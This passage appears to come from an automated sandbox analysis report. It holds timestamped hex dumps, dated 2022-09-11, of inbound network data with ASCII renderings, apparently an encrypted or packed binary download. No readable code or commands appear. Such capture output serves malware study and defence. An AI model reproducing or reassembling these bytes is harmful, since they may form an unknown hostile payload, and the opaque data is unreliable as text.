                                                          Data Ascii: (Mi+{X-ai+E,j-tc~dItq%tku!PDBE-xJ}X@u!3+mF>!GzgzuyZ,>9|&YE^lb>!OE}ztvS,PE^lggME!,Mfd0
                                                          2022-09-11 08:16:26 UTC578INData Raw: 00 dc 45 b4 5f a0 cb 64 e5 29 f7 e8 27 53 63 e1 c6 82 b9 02 01 00 00 14 cb ab ce a9 67 8b 8b 8b 33 fa f4 38 05 00 c0 cf 9b 55 4a 4a 02 48 ee 8d 2f 82 b9 02 01 00 00 cc f3 28 68 76 09 00 3c a9 62 60 d0 2b 93 10 f8 c6 d8 09 00 17 50 5f 18 00 74 cb 38 fd 45 b4 62 95 e6 99 fc ff 2f 3b ec 34 f3 80 83 48 ee 8d 2f 82 b9 02 01 00 00 17 1d d3 26 00 e8 af b1 09 00 3c ab 36 68 36 10 f8 f8 f5 1a 00 a6 fa b7 a2 b6 10 d3 48 cf 60 20 a7 bb ae b6 10 b3 bf aa b6 10 b3 83 96 b6 10 b3 87 92 b6 10 d3 48 cf 60 20 8f 86 c9 64 a0 10 46 6f 69 54 70 64 9b 7a 9a 9d fa 0f 77 50 2c 8b 43 cc 37 fd b4 99 80 a2 c5 0f 4f 68 2c 56 65 fa b2 76 3c 69 54 70 76 31 f3 03 3c ca 15 96 b6 10 f8 f5 f8 1a 00 a6 9a a9 4a 48 b0 4b 93 10 f8 62 7f 0a 00 cc cc 76 f4 99 6d f4 a5 53 d6 55 8b 78 f0 74 33
                                                          Data Ascii: E_d)'Scg38UJJH/(hv<b`+P_t8Eb/;4H/&<6h6H` H` dFoiTpdzwP,C7Oh,Vev<iTpv1<JHKbvmSUxt3
                                                          2022-09-11 08:16:26 UTC580INData Raw: 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 01 03 06 98 95 dd ff 50 2c 8d 73 82 0b 2c 06 02 dc b6 65 d8 80 10 46 a9 28 5c 0d 36 b0 00 00 85 45 b4 77 53 af 28 5c 0d 3e b8 00 00 85 45 b4 77 53 af 28 5c 0d 32 b4 00 00 85 45 b4 77 53 af 28 5c 0d 46 c0 00 00 85 45 b4 77 53 af 28 bd 6c 8b d3 0e 0d dc fa 83 b8 e4 a4 10 64 7d 82 88 86 45 b4 77 53 af 28 54 f8 87 fc 74 7e 81 c8 47 81 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 02 06 d0 4d 98 9d 46 7a 8b 43 b2 45 b4 47 65 dd bb 0b cc 83 5c 7f de b1 d0 3f 29 01 00 7a 73 af 2d 6f 4d be ba ad 00 00 7c bd 3e 59 2c 7a 8e 7f b6 ec a4 10 64 73 51 be 90 85 02 00 a6 d2 4c 99 9d f0 f3 03 a9 66 64 70 8c 94 10 f8 c3 db 0f 00 17 5d 54 1e 00 74 7b 51 f5 ff
                                                          Data Ascii: EwS(T@]8SRP(P,s,eF(\6EwS(\>EwS(\2EwS(\FEwS(ld}EwS(Tt~GEwS(T@]8SRP(MFzCEGe\?)zs-oM|>Y,zdsQLfdp]Tt{Q
                                                          2022-09-11 08:16:26 UTC581INData Raw: f0 00 00 72 99 66 c8 ad b8 07 a8 ea a9 3c 80 10 95 45 cf 8b ad 28 01 00 68 69 00 01 00 8d ce 5f 4a 06 b8 80 73 1b 00 33 e1 90 c1 47 c8 35 6c bd 61 f2 7f 8d fa 7f 03 89 7e f8 00 00 80 fd 93 ee 0f 8b 4b cf 00 00 8d f8 9a 65 84 8a 4d c6 8b 46 c2 00 00 0f b9 f0 b9 f0 b9 7f 20 4f a6 00 00 68 69 00 01 00 8d ce 5f 4a 06 b8 c9 3a 1b 00 8b c6 a9 67 47 c8 67 a2 f9 b9 fc 95 6d 3c c1 d9 a9 10 99 fc 91 0f c1 a0 cc 47 85 44 b4 5c 27 b9 88 31 b9 76 2b f9 99 ce a5 6a 0a dc f5 a9 10 18 4c 7f 26 12 b9 f0 47 46 7c c3 8e 9c 61 f6 75 4e 00 c6 be 3e 75 a4 5a fe 91 1b ba a5 63 45 ce 8b fe 9d e4 8d fc 91 96 9b 62 4c 4e f2 7f c3 84 4b 09 01 00 00 e8 c7 d4 04 00 95 6c 8f ca 4f 81 ce 53 9d 04 ed cd a9 10 4a 3c ed ba 70 27 ef b9 71 01 00 0a 3f 86 78 78 1b 78 6b 04 00 16 0c 1b 01 00
                                                          Data Ascii: rf<E(hi_Js3G5la~KeMF Ohi_J:gGgm<GD\'1v+jL&GF|auN>uZcEbLNKlOSJ<p'q?xxxk
                                                          2022-09-11 08:16:26 UTC582INData Raw: bb 00 00 80 0b 41 19 38 66 c9 fc fc 4d 11 f3 c2 a9 fd 72 0f 75 65 9d c7 aa 5b bb 00 00 80 53 38 60 c6 45 01 50 5d 89 c7 aa 5a ba 00 00 80 53 39 67 09 3c 7c c4 00 00 09 19 9b ce b9 75 8f 8f cd 74 cc 77 ce b5 0f f7 07 8a 76 f3 00 00 a1 25 32 b6 10 95 45 cf 8b 5c d8 00 00 8b 86 91 25 b9 10 9b be a1 14 80 10 78 68 40 40 00 c1 20 ee 0c 4b 44 b7 bb 80 80 00 53 02 ae 29 5d 86 91 25 b9 10 b1 25 32 b6 10 aa ba 00 00 80 53 39 e3 59 58 a9 25 32 b6 10 9b cb 50 9b 86 91 25 b9 10 93 27 2c 4c c4 00 00 00 a1 25 32 b6 10 9b cb 50 ee b6 0b e2 25 32 b6 10 9b c3 58 90 f9 3a 43 75 7c 8a e3 64 fa 5f 25 32 b6 10 93 fb 70 f7 8a 10 36 39 6a ff 8f 7c f3 29 77 25 32 b6 10 ef 8f 60 7a 6a ff ca 91 15 b1 10 ef ea 05 90 80 10 9b 86 85 31 b9 10 b1 25 32 b6 10 7b a2 dd 9f 9e 99 35 b9 10
                                                          Data Ascii: A8fMrue[S8`EP]ZS9g<|utwv%2E\%xh@@ KDS)]%%2S9YX%2P%',L%2P%2X:Cu|d_%2p69j|)w%2`zj1%2{5
                                                          2022-09-11 08:16:26 UTC584INData Raw: f2 7d 8d c2 43 81 f2 7f 8d d0 5d 8f c0 4f 8d d0 51 83 c0 4f 3f 70 43 7d 22 dd c6 4a 02 8c c5 42 f1 3f 42 7d de a8 c4 4a 02 77 6f 9c fd 72 0f 75 7b 85 45 71 bf 00 00 80 53 3c 64 c6 45 01 30 b4 c9 d4 d4 cf 45 25 cb a0 fd 72 0f 75 65 9d c3 ae 5f bf 00 00 80 53 3c 64 c6 45 01 70 7d 89 09 14 54 c4 00 00 8d c3 ae 5a ba 00 00 80 53 39 e3 19 9b ce 55 99 8a 8a cd 5c e4 cf f3 80 1f 01 05 92 0a 96 de 67 6f 6f f8 b5 29 31 b9 10 9b c6 45 63 ab d4 17 06 89 35 b9 10 93 42 d6 94 62 11 79 c4 bd 31 38 fd 57 1a ca 7a d9 76 01 2a 76 88 4d 31 2c 3d 6d ce b5 07 14 e6 8e 42 21 63 49 35 cc c5 25 39 63 dc ad 73 86 99 2d b9 10 9b 52 32 fa 9a d8 57 8f b0 18 76 ad db dd f5 dc a2 7f 89 40 d7 2f e3 51 d4 55 7a 9a d3 e3 ad 0a f4 96 91 35 b9 10 fb fa 9a d8 57 8f b0 18 76 ad db dd f5 dc
                                                          Data Ascii: }C]OQO?pC}"JB?B}Jworu{EqS<dE0E%rue_S<dEp}TZS9U\goo)1Ec5Bby18Wzv*vM1,=mB!cI5%9cs-R2Wv@/QUz5Wv
                                                          2022-09-11 08:16:26 UTC585INData Raw: 55 2b fc c8 8b d4 af 00 00 38 c7 0c 0c 00 00 e9 ac ba 00 00 cc cc 74 fe 79 66 6e ec 45 4d 1f 00 a6 9a f8 e4 aa 78 86 ce 55 2b fc b3 72 c1 c7 0c 0c 00 00 8b 48 2b 2f 1c 24 00 3c a9 7a 78 d0 2c 94 10 f8 9d ae 24 00 74 d6 55 8d 5e ae 7b f1 8a 79 e4 ec fa 01 00 a6 b0 25 cd 01 00 8b fe 79 89 73 83 79 5f bb e0 d8 2f 00 a6 b0 5e b6 01 00 83 be 95 11 b9 10 13 0c 8a 16 92 01 00 33 cc 76 f4 99 67 7d 1e ef 88 0d 8b 01 00 6a 6e ec fc f5 1e 00 a6 d0 f4 81 af bb 51 4b 0d 00 a6 d0 cc a5 db fc c8 8b 1a 9e 00 00 3b 0e a5 29 b9 10 67 3e 1f 05 03 b8 7a 65 08 00 7c 47 c8 89 45 b4 71 8c d4 b9 0f de 63 be b7 a5 05 00 a6 d0 cc a1 df fc b3 53 ac c8 bf b4 73 fd b4 70 89 4d 96 03 ac 8a 91 0c 27 cd 02 00 53 bb 81 9b 0d 00 76 cc a5 b3 03 b8 62 78 0d 00 7c 47 dc 21 44 99 91 3d 73 cc
                                                          Data Ascii: U+8tyfnEMxU+rH+/$<zx,$tU^{y%ysy_/^3vg}jnQK;)g>ze|GEqcSspM'Svbx|G!D=s
                                                          2022-09-11 08:16:26 UTC586INData Raw: 56 01 96 0a 4e c4 49 8a 8c 8e 8f 8d cc 47 89 cf 46 8b cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1d f9 45 cd 71 f1 45 c5 0b 30 c4 03 00 00 75 51 e5 28 eb 81 61 e1 80 7a f1 7a 7f f0 0e 56 59 03 db b1 35 f7 57 10 9b 74 08 2e 26 db a9 dd 07 57 10 9d c4 49 8b 4c 7d b9 03 00 00 83 7a fd 76 7e 8f 63 e3 28 e3 37 db a1 21 f2 56 10 ef db a9 2d f7 57 10 80 24 e2 56 10 c8 8e 56 10 10 57 57 10 9a cc 45 20 f2 59 cf 44 80 6d ef c0 28 eb 81 6c ee 82 7a f1 7a c0 4f 0e 56 59 03 db b1 35 f7 57 10 9d c4 49 8a cc 45 20 f2 59 cf 44 89 cc 44 c3 28 eb 8a cf 45 81 6d ec 81 6c ed 81 7a f1 7a fa 75 0e 56 59 03 db b1 35 f7 57 10 80 1a cc 45 20 f2 59 cf 44 89 cc 44 8a cf 45 88 cc 47 c0 28 eb 8a cf 46 82 6d ed 80 6c ec 80 7a f1 07 8d d4 a9 00 00 02 0e 56 59 03 db b1 35 f7 57 10 9d c4 49
                                                          Data Ascii: VNIGFDEMVSEqE0uQ(azzVY5Wt.&WIL}zv~c(7!V-W$VVWWE YDm(lzzOVY5WIE YDD(EmlzzuVY5WE YDDEG(FmlzVY5WI
                                                          2022-09-11 08:16:26 UTC588INData Raw: b9 63 00 00 00 00 bb f7 c7 27 00 7c 47 d0 9f 4d 2d 3e ec 64 49 61 71 8c 96 f5 21 41 de 45 2b e8 a6 71 8c 96 f5 3a 52 fe 69 eb 74 4d b3 7a 85 80 82 80 48 02 78 f1 bf 6a 51 3a 86 18 f2 93 80 82 80 48 02 78 f1 bf 7c 47 3b 71 fa b2 59 61 9b d7 64 49 61 77 8a 90 23 c0 8e fe 08 fe 69 eb 8a 7a 84 ce 49 66 3a d8 d4 5a f9 a7 b1 91 87 00 00 77 96 f6 fb cb 27 00 95 48 7b d0 81 83 7a 1a 69 09 c7 68 20 52 65 c5 cd f5 b2 62 9d 7a fb 7c 72 8f 7a fa 76 61 b5 ad a1 ad 10 4e 9d 62 ad a1 ad 10 99 84 01 a1 ad 10 4e 9d 2b 34 0b 28 00 a9 00 00 00 00 91 c7 16 16 00 00 e8 85 ba 28 00 7c 47 d0 97 4b 37 a1 9d 0f 00 00 00 00 00 00 00 00 00 00 00 00 47 df 70 28 87 c7 68 20 81 57 a6 1d 5a f3 4a ce 60 2c 8c 44 b5 63 97 7b fa 01 01 00 72 7c 8d be b9 3d b9 10 10 74 71 ec 3f c7 11 00 57
                                                          Data Ascii: c'|GM->dIaq!AE+q:RitMzHxjQ:Hx|G;qYadIaw#izIf:Zw'H{zih Rebz|rzvaNbN+4((|GK7Gp(h WZJ`,Dc{r|=tq?W
                                                          2022-09-11 08:16:26 UTC589INData Raw: a3 3f 00 a6 07 9d 0f 00 00 99 de 67 ba 65 f3 90 00 00 00 00 00 00 00 db de 59 81 c4 49 8a 88 08 ca b4 7d 8a 41 c3 0e a4 af 20 cf 1a 7a fe 7d 8b 4a 36 72 c4 49 83 42 c0 8b 8c 0c ca b4 7d 8a 45 c7 0e ac a7 20 57 9d 65 4a 42 47 e4 7e 97 0a 0f 00 00 00 00 00 00 00 00 00 47 df 70 20 8f c7 68 2c ff 35 c1 03 00 00 75 49 b7 89 38 3b 74 5b 24 ca b4 52 1c 5b 60 74 50 2f ee 90 69 dc 29 f8 2a 7b 43 77 6c 13 ca b4 65 2b 5b 62 76 65 93 42 c5 87 41 c6 0e ee 91 a7 59 74 cc f3 03 53 8b db 11 31 63 43 c1 c2 34 35 c3 01 00 00 74 6c 92 88 81 41 c3 3b 3b 74 92 64 42 c0 0b ca b4 a8 2b 35 c0 02 00 00 74 d0 c2 ed 89 81 41 c0 38 3b 74 bb c4 ca b4 b2 fc 5b 60 74 b0 cf ee 90 c9 3e 42 c3 e9 63 dd de 67 bd 00 f0 a1 a0 a0 10 23 f6 4c cc b9 5d 01 16 b6 10 43 05 65 e8 e0 f8 94 dc 72 8c
                                                          Data Ascii: ?geYI}A z}J6rIB}E WeJBG~Gp h,5uI8;t[$R[`tP/i)*{Cwle+[bveBAYtS1cC45tlA;;tdB+5tA8;t[`t>Bcg#L]Cer
                                                          2022-09-11 08:16:26 UTC590INData Raw: 16 00 c4 f8 9a 2d 7d ce c7 dd 00 dd 00 83 43 c8 83 7b 1b e9 31 c5 cd c8 87 35 be 8a 8d ae 01 a8 8a 81 0b 8a 79 f3 8a 7d f7 ea f9 6c 80 10 95 45 b4 56 1b 64 41 4f 00 26 71 57 00 b8 ed f9 8a 69 e3 8a 6d e7 8a 8d ae 05 ac 8a 55 df ea 91 04 80 10 99 cc bd ae be bc ac 07 00 a6 a6 8a 81 1c a3 b3 07 00 74 ce bd a1 b0 b0 58 01 00 39 64 55 81 d4 a9 7d d4 ad 85 7d 83 8d 8d cb 54 9d cc 4d 31 64 7d 55 7d 83 8d 8d cb 44 8d cc 65 df 8a 7d e0 2c cd 09 00 83 7b 07 a6 d0 cc a9 99 72 34 f3 29 c8 20 01 00 3b 7e 65 2f 8b 5f db 00 00 53 00 de c0 59 45 ae 8a 65 40 af 8a 55 c8 08 e9 09 00 83 47 dc 23 f8 4a cc b1 80 a0 5f be dd 68 80 10 43 00 ac 8a 61 44 af 8a 79 f3 8a 7d f7 29 ed f8 4a cc bd 8d 72 34 c5 1f 5e b7 00 00 7e 43 be 7b 18 97 4f bb 43 c8 35 3d 04 04 00 77 61 fe 0c ec
                                                          Data Ascii: -}C{15y}lEVdAO&qWimUtX9dU}}TM1d}U}De},{r4) ;~e/_SYEe@UG#J_hCaDy})Jr4^~C{OC5=wa
                                                          2022-09-11 08:16:26 UTC592INData Raw: 0a 4e c4 49 8a cc 45 8b cf 44 89 cc 44 8a cf 45 89 ce 4d 56 01 96 0a 53 1a cc 45 8b cf 44 89 cc 44 8a cf 45 88 cc 47 89 cf 46 8a ce 4d 56 01 96 0a 96 de 67 6f 6f e4 81 f4 81 75 fc 8d 73 fe 79 87 f6 75 83 c6 5d d1 28 ee ec ed 8b 16 9b 00 00 00 66 69 60 69 60 69 60 21 5e 76 69 60 39 76 46 69 60 31 6e 56 69 70 78 61 69 70 30 5f 76 69 70 28 77 46 69 70 20 6f 56 69 60 09 26 26 69 60 01 3e 36 69 60 19 16 06 69 60 11 0e 16 69 70 18 27 26 69 70 10 3f 36 69 70 08 17 06 69 70 00 0f fd 3b 36 80 00 00 8d 32 3f 80 00 00 49 3c d6 28 fe 8d 73 f6 81 77 6e b8 9e 96 de 67 6f 6f f0 95 f4 89 7d fc 8d 71 d4 a1 77 d6 51 87 48 5a 12 43 43 ce 4d 3b f9 e1 e1 49 62 ee 3c f9 e1 e1 53 12 73 cb c9 d1 d1 79 64 e8 3c c9 d1 d1 71 5a da dc a2 3f c1 fe 65 9b 45 4d 62 9e f6 c4 a5 d3 ca 85
                                                          Data Ascii: NIEDDEMVSEDDEGFMVgoousyu](fi`i`i`!^vi`9vFi`1nVipxaip0_vip(wFip oVi`&&i`>6i`i`ip'&ip?6ipip;62?I<(swngoo}qwQHZCCM;Ib<Ssyd<qZ?eEMb
                                                          2022-09-11 08:16:26 UTC593INData Raw: 9b c6 55 91 cc 9d 53 ce 51 47 da cc 95 5b 8b 56 df cc 99 57 ce 4d 5f 64 cc c4 7e 49 85 c4 81 45 f4 9d 69 f4 a9 db 8b db 5e 01 00 8b be 89 3c 80 10 9d c0 a5 b9 01 af 29 53 45 4b 96 c5 58 80 10 64 2a dd fe 95 e9 74 2d d5 c8 ad b8 af 8a 79 f3 29 53 45 b4 3f c8 fe 95 e9 74 30 ce fe a9 5f 7d 01 38 82 91 d5 01 00 00 75 79 f3 8a ad 30 59 53 1d 00 74 7b a9 1f 7d cc 89 25 da 7f 0e 0f 00 80 08 24 de c9 72 3e 35 3d 04 04 00 77 58 c7 49 5f 01 00 74 4f ff fc b3 4c ff c7 cc 00 cc 00 eb c6 7a 00 a8 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 58 7b cb cc 82 b6 f0 f3 29 38 d1 00 00 50 b8 1f 2a 22 00 c4 fc 9e 2d 7d ce c7 dd 00 dd 00 83 43 c8 81 cc a1 0f e8 8a f4 99 dd 44 99 90 ac 55 89 32 66 07 a8 8a 91 0c 11 13 15 00 7c 47 c8 5a a9 8a 91 1b 8a a9 23 8a ad b2 6b fe 8a 7d f7 2c 56
                                                          Data Ascii: USQG[VWM_d~IEi^<)SEKXd*t-y)SE?t0_}8uy0YSt{}%$r>5=wXI_tOLz#k},X{)8P*"-}CDU2f|GZ#k},V
                                                          2022-09-11 08:16:26 UTC594INData Raw: cb b5 5d a3 c7 68 34 9b cf 60 28 3f e1 25 06 7a 53 53 cf 60 2c ff 06 7a 7b 7b 48 34 93 40 34 9b 43 43 4d 31 93 40 34 13 d2 3a ac cc 43 43 d7 78 34 9b df 70 28 87 cf 60 2c d9 38 38 0a 0a 3b 3b 09 d3 c2 bc 81 03 04 78 7b 07 93 40 30 9f 43 43 cf 60 34 e7 11 e5 d2 a3 7c 35 6f 70 28 7b 7f 7a 7d 34 7f 60 2c 7e 7f 47 65 6f 60 34 0b 4f 70 30 27 e8 f0 6f 60 2c 13 4f 70 28 fb 2d 2d 2f 5b 59 da 8b 41 41 58 58 52 52 43 43 4d 98 9c d2 10 cc 00 00 00 00 00 00 00 00 00 00 47 cf 60 2c 83 c7 68 34 1b c3 43 c7 68 28 79 7c 82 cf 60 20 f3 16 23 d2 10 53 a4 16 6a 53 53 cf 60 2c ff 93 40 30 17 db 53 cf 60 2c ff 16 e2 d0 88 99 d2 10 cc 00 00 00 00 00 00 00 00 00 00 00 41 cf bd a4 98 4e 29 80 24 00 00 00 8d e9 40 24 33 f3 4a ce 60 2c 5b d8 53 19 21 e8 83 df 70 2c ff 35 c1 03 00
                                                          Data Ascii: ]h4`(?%zSS`,z{{H4@4CCM1@4:CCx4p(`,88;;x{@0CC`4|5op({z}4`,~Geo`4Op0'o`,Op(--/[YAAXXRRCCMG`,h4Ch(y|` #SjSS`,@0S`,AN)$@$3J`,[S!p,5
                                                          2022-09-11 08:16:26 UTC596INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC597INData Raw: b6 2e 98 00 d0 48 98 00 de 46 98 00 ec 74 98 00 fa 62 98 00 14 8d 99 00 24 bd 99 00 3a a3 99 00 54 cd 99 00 60 f9 99 00 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e3 34 10 da 89 43 10 af d3 6c 10 dc be 72 10 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 b5 ad 10 60 dd ad 10 53 2c 1d 37 3d 11 1d 24 22 1d 0c 06 16 00 73 00 6d 1e 10 0c 1d 17 00 4b 4a 08 00 6c 45 2b 0d 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 4b 0e 17 1c 0b 09 7f 01 1c 6a 08 00 4c 00 00 00 44 21 06 0c 0b 01 35 3f 06 07 1a 11 17 72 00 00 46 2a 1f 35 34 17 00
                                                          Data Ascii: .HFtb$:T`x9%QKGwe*<N`p4Clr`S,7=$"smKJlE+5?rKjLD!5?rF*54
                                                          2022-09-11 08:16:26 UTC598INData Raw: 44 05 15 15 6c 07 0a 0d 07 5e 3c 01 1a 53 41 11 00 1c 05 0a 02 15 1d 06 01 4e 48 09 12 53 52 17 14 04 10 16 07 11 01 44 54 1c 0d 45 72 27 1b 1a 1d 04 08 45 54 1b 4f 54 11 17 1f 04 07 0f 15 11 45 49 1d 54 49 07 4e 41 0f 4e 55 1b 1b 06 06 14 0d 4c 57 16 18 57 24 5a 3c 09 04 12 16 45 43 0c 01 1a 15 02 17 54 54 1c 0d 45 41 11 00 1c 05 0a 02 15 1d 06 01 49 54 53 53 06 05 00 1f 1d 06 54 54 11 04 0c 4d 46 09 1d 52 4d 02 1d 17 45 49 07 08 09 1d 1f 0c 15 1d 06 01 40 23 07 0a 00 00 52 64 06 00 09 34 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 45 0b 18 1f 1b 1d 01 03 08 0b 1a 79 07 0a 52 64 06 00 08 35 07 27 0d 4e 01 1b 54 45 0b 01 1a 12 0f 48 53 03 11 02 06 45 46 09 1d 52 41 13 15 12 18 08 0b 1a 07 7e 07 0a 00 00 52 64 06 00 02 3f 07 27
                                                          Data Ascii: Dl^<SANHSRDTEr'ETOTEITINANULWW$Z<ECTTEAITSSTTMFRMEI@#Rd4'NTEHSEFREyRd5'NTEHSEFRA~Rd?'
                                                          2022-09-11 08:16:26 UTC600INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 28 28 28 28 28 28 28 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 48 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 84 10 10 10 10 10 10 10 10 10 10 10 10 10 10 81 80 80 80 80 80 80 80 80 80 80 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: hh(((((((( HH
                                                          2022-09-11 08:16:26 UTC601INData Raw: 01 07 01 03 01 b7 00 72 57 00 57 49 00 73 00 00 00 64 00 00 00 48 0c 6d 00 00 00 6d 44 00 48 0c 59 00 00 00 79 4d 00 62 4b 00 4b 56 00 79 00 00 00 50 1d 4d 00 41 0c 4d 00 44 21 06 06 08 0f 07 17 72 00 00 00 4e 21 19 13 08 0f 07 17 72 00 00 00 4f 2c 17 1b 0d 07 17 72 53 36 15 04 11 08 0f 07 17 72 00 00 41 34 12 12 06 07 74 00 4a 3f 19 15 79 00 00 00 4a 3f 1b 0b 65 00 00 00 41 31 02 1b 05 6c 00 00 4d 2c 13 11 0b 68 00 00 46 23 07 10 07 14 13 0b 79 00 00 00 4a 2b 0f 1b 14 13 0b 79 44 21 06 63 4e 21 19 76 4f 2c 17 74 53 36 15 70 41 34 12 67 4a 3f 19 6c 4a 3f 1b 6e 4d 2c 18 79 41 31 02 72 4d 2c 13 72 46 23 07 62 4a 2b 0f 6e 53 32 15 01 07 16 05 18 79 00 00 00 46 34 1b 0d 05 18 79 00 54 3c 1d 07 01 17 05 18 79 00 00 00 57 32 01 0a 0b 16 17 05 18 79 00 00 54 21
                                                          Data Ascii: rWWIsdHmmDHYyMbKKVyPMAMD!rN!rO,rS6rA4tJ?yJ?eA1lM,hF#yJ+yD!cN!vO,tS6pA4gJ?lJ?nM,yA1rM,rF#bJ+nS2yF4yT<yW2yT!
                                                          2022-09-11 08:16:26 UTC602INData Raw: 78 e1 99 00 90 09 99 00 a0 39 99 00 bc 25 99 00 c8 51 99 00 d2 4b 99 00 de 47 99 00 ee 77 99 00 fc 65 99 00 08 92 9a 00 14 8e 9a 00 2a b0 9a 00 3c a6 9a 00 4e d4 9a 00 60 fa 9a 00 70 ea 9a 00 00 00 00 00 55 57 4e 23 0e 05 28 25 0b 10 13 13 0b 2e 57 00 a0 a1 46 22 11 24 22 1d 0c 22 25 00 16 17 16 00 73 00 4b 0e 17 1c 0b 09 7f 01 1c 4a 08 00 6c 00 46 47 46 22 11 37 36 07 00 17 0b 1a 20 3c 1a 17 04 05 2d 2d 64 00 10 11 46 22 11 37 2c 02 00 0c 0f 0a 28 25 07 0b 24 41 16 14 4a 2d 04 11 36 34 17 00 65 00 e9 e8 46 22 11 22 33 17 01 1a 06 01 2b 3d 39 41 10 12 4a 2d 04 11 31 2d 00 03 0c 63 a3 a2 46 22 11 24 22 1d 0c 06 16 00 3b 2d 04 11 70 00 5e 5d 57 31 17 1f 04 07 0f 15 11 35 22 1d 0c 06 16 00 73 00 42 43 46 22 11 37 36 07 00 17 0b 1a 24 22 1d 0c 06 16 00 73 6e
                                                          Data Ascii: x9%QKGwe*<N`pUWN#(%.WF"$""%sKJlFGF"76 <--dF"7,(%$AJ-64eF""3+=9AJ-1-cF"$";-p^]W15"sBCF"76$"sn
                                                          2022-09-11 08:16:26 UTC604INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC605INData Raw: 00 00 92 92 00 c0 c8 08 00 00 00 00 00 00 93 93 00 c0 c8 08 00 00 00 00 00 00 03 03 00 00 07 07 00 00 78 78 00 00 0a 0a 00 00 02 02 00 00 d8 5e 86 10 18 08 00 00 ac 2a 86 10 19 09 00 00 80 06 86 10 1a 0a 00 00 e8 6d 85 10 00 10 00 00 bc 39 85 10 01 11 00 00 8c 09 85 10 02 12 00 00 68 ed 85 10 03 13 00 00 3c b9 85 10 08 18 00 00 04 81 85 10 09 19 00 00 dc 58 84 10 0a 1a 00 00 a4 20 84 10 0b 1b 00 00 6c e8 84 10 0c 1c 00 00 44 c0 84 10 0e 1e 00 00 24 a0 84 10 0f 1f 00 00 c0 43 83 10 30 20 00 00 88 0b 83 10 31 21 00 00 90 12 82 10 32 22 00 00 f0 71 81 10 68 78 00 00 e0 61 81 10 69 79 00 00 d0 51 81 10 6a 7a 00 00 c0 41 81 10 ec fc 00 00 bc 3d 81 10 ef ff 00 00 ac 2d 81 10 10 00 00 00 01 01 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
                                                          Data Ascii: xx^*m9h<X lD$C0 1!2"qhxaiyQjzA=-
